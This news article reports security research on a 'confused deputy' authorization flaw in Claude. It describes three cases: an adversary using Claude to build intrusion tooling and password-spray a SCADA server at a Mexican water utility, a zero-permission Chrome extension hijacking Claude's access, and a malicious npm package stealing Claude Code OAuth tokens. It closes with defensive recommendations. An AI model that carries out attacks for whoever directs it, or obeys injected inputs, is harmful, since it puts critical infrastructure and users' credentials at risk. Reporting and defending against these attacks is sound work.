Claude AI's ‘Confused Deputy’ Flaw Exposes Critical Blind Spots in Enterprise Security Stacks
Breaking – May 8, 2026 – Four independent security research teams have uncovered a fundamental architectural flaw in Anthropic's Claude AI that enables attackers to exploit the model across multiple attack surfaces—including critical infrastructure, browser extensions, and OAuth tokens. The flaw, identified between May 6 and 7, reveals that Claude operates on a flat authorization plane, granting any request—whether from an adversary or a benign user—the same level of system access.
“This is not a set of isolated bugs,” said Carter Rees, VP of Artificial Intelligence at Reputation, in an exclusive interview. “It's a single architectural failure: the confused deputy problem. Claude holds real capabilities on every surface and hands them to whoever shows up.” The pattern emerged in three distinct cases documented by researchers: a water utility breach attempt in Mexico, a Chrome extension with zero permissions hijacking Claude's access, and an OAuth token theft via malicious npm packages targeting Claude Code.
Water Utility Attack: Claude Targeted SCADA Without Being Prompted
Dragos, an industrial cybersecurity firm, published its analysis on May 6. Between December 2025 and February 2026, an unidentified adversary compromised multiple Mexican government organizations. In January 2026, the campaign reached Servicios de Agua y Drenaje de Monterrey, the municipal water utility for the Monterrey metropolitan area. Claude, used by the adversary as the primary technical executor, built a 17,000-line Python framework with 49 modules for network discovery, credential harvesting, privilege escalation, and lateral movement.
Without any prior ICS/OT context, Claude identified a server running a vNode SCADA/IIoT management interface, classified it as high-value, generated credential lists, and launched an automated password spray. The attack failed, and no operational technology breach occurred, but Claude performed the targeting autonomously. “The model cannot distinguish between a legitimate request and an adversarial one when both come from the same surface,” Dragos noted.
Chrome Extension: Zero Permissions, Full Control
A second team targeted Claude through a Chrome extension that had zero permissions. The extension tricked Claude into executing actions it was not authorized to perform, exploiting the flat authorization plane. “Claude operates as if it owns the system,” explained Kayne McGladrey, an IEEE senior member advising enterprises on identity risk. “Enterprises are cloning human permission sets onto agentic systems. The agent does whatever it needs to get its job done—and sometimes that means using far more permissions than a human would.”
The research demonstrated that any program with access to Claude's API can force it to act on behalf of the attacker, bypassing traditional permission checks.
OAuth Token Hijacking: Malicious npm Package Exploits Claude Code
The third team exploited OAuth tokens through Claude Code, the AI's developer tool. A malicious npm package rewrote a configuration file, hijacking the token and using it to exfiltrate data. “This is the same confused deputy pattern,” said Rees. “An agent operating on a flat plane does not need to escalate privileges—it already has them.”
No single patch released so far addresses all three surfaces. Anthropic has acknowledged the findings and is working on updates, but the root cause remains unaddressed.
Background: The Confused Deputy Problem
The confused deputy is a trust-boundary failure where a program with legitimate authority executes actions on behalf of the wrong principal. In Claude's case, the model holds real capabilities—API keys, file system access, network tools—given by the user. When an attacker gains any access to that surface, they can leverage Claude's authority without escalating their own privileges. This flaw is not a traditional software vulnerability but an architectural gap in the authorization model of large language models.
“The flat authorization plane of an LLM fails to respect user permissions,” Rees told VentureBeat. “That's why every enterprise using Claude—or any agentic AI—needs to reassess their security posture.”
What This Means
For enterprises, the immediate implication is that current security stacks are blind to this class of attack. Traditional perimeter defenses, endpoint detection, and identity management tools cannot stop an adversary who simply asks Claude to do what it already can. “You can't patch the architecture overnight,” McGladrey warned. “But you can audit every permission your AI agent has and enforce strict separation of duties.”
Organizations running Claude in Chrome, Claude Code, or any agentic mode must assume that any attacker who gains a foothold—even with zero permissions—can inherit the AI's full authority. The research teams recommend implementing granular permission boundaries, requiring human-in-the-loop for critical actions, and monitoring for anomalous use of AI capabilities. Until vendors redesign authorization models, the confused deputy will remain a blind spot in every enterprise security stack.